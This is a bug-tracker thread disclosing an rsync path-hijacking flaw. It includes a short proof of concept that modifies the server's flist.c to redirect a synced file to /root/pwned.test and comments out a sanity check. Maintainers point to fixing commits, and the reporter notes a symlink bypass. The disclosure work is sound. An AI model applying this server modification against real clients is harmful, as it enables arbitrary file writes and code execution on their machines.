Created attachment 10433 [details] Rsync path hijacking attack vulnerability.pdf (Detailed documentation) Hi all: In newest version rsync,Baidu Security Team found a vulnerability which is similar to wget ftp CVE-2014-4877 (http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4877).When a clientuses parameter -a to synchronize files of the server-side(default), for example: rsync -avzP 127.0.0.1::share /tmp/share Rsync recursive synchronous all files,An attacker can hijack the file path by modifying the code of the server-side,allows remote servers to write to arbitrary files, and consequently execute arbitrary code . Vulnerability Details : First I shared in the Rsync folder to write the following documents [root@pentest rsync]# ls -lh total 8.0K -rw-r--r-- 1 root root 2 Oct 31 03:16 1.txt drwxr-xr-x 2 root root 4.0K Oct 31 05:17 truedir [root@pentest rsync]# cd truedir/ [root@pentest truedir]# ls pwned [root@pentest truedir]# cat pwned rsync test [root@pentest truedir]# Next I modify the server to send the file code,in the process of synchronizing,the path of file "pwned" can be blocked and changed into any path . file: flist.c line:394 static void send_file_entry(int f, const char *fname, struct file_struct *file, #ifdef SUPPORT_LINKS const char *symlink_name, int symlink_len, #endif int ndx, int first_ndx) { if(strcmp(fname,"turedir/pwned") == 0){ fname="/root/pwned.test"; //Arbitrarily path } Then, verification occurs in the server-side and says “received request to transfer non-regular file /root/pwned.test 7 [sender]”,But as an attacker, the code of the server-side can be arbitrarily controlled,Shielding the following code. file:rsync.c line:405 /* if (iflags & ITEM_TRANSFER) { int i = ndx - cur_flist->ndx_start; if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) { rprintf(FERROR, "received request to transfer non-regular file: %d [%s]\n", ndx, who_am_i()); exit_cleanup(RERR_PROTOCOL); } } */ The file "pwned" will be downloaded into forged path(/root/pwned.test).
in other words - a malicious rsync server can force a client to create any file in any path, as long as the client can write to that path ? indeed, interesting find - and a security bug then.
(In reply to roland from comment #1) yes
In your test, you didn't use 3.1.1 on the client side. This was fixed in that release: ABORTING due to unsafe pathname from sender: /root/pwned.test
that fix is this two commits, correct ? https://git.samba.org/?p=rsync.git;a=commit;h=371242e4e8150d4f9cc74cdf2d75d8250535175e https://git.samba.org/?p=rsync.git;a=commit; h=4cad402ea8a91031f86c53961d78bb7f4f174790
(In reply to roland from comment #4) Yes, those are the commits for this bug.
(In reply to Wayne Davison from comment #3) yes ! In newest version rsync(3.1.1),directly modify the file path into absolute path is not hijack succeed due to the security checks,but using symbolic links still can bypass security checks and spoofing client. A new bug I submitted :https://bugzilla.samba.org/show_bug.cgi?id=10977